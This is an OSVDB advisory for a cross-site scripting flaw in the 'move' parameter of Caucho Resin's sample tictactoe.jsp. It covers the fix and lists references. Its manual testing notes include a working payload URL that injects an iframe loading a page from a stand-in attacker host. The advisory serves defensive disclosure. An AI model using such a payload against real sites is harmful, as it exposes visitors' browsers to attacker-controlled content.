Caucho Resin tictactoe.jsp move Variable XSS

2003-10-20T00:00:00
ID OSVDB:3393
Type osvdb
Reporter Donnie Werner(wood@e2-labs.com)
Modified 2003-10-20T00:00:00

Description

Vulnerability Description

Caucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the "move" variable upon submission to the "tictactoe.jsp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): removing the tictactoe.jsp script

Short Description

Caucho Resin sample scripts contain a flaw that allows a remote Cross Site Scripting attack. This flaw exists because the application does not validate the "move" variable upon submission to the "tictactoe.jsp" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://[attacker]/evil.cgi"></iframe>

References:

Vendor URL: http://www.caucho.com/resin/index.xtp Snort Signature ID: 1497 Secunia Advisory ID:10031 Related OSVDB ID: 3394 Related OSVDB ID: 3390 Related OSVDB ID: 4983 Related OSVDB ID: 3388 Nessus Plugin ID:10815 Keyword: EXPL-A-2003-026 exploitlabs.com Advisory 026 ISS X-Force ID: 13460 Generic Informational URL: http://lists.netsys.com/pipermail/full-disclosure/2003-October/012361.html Bugtraq ID: 8852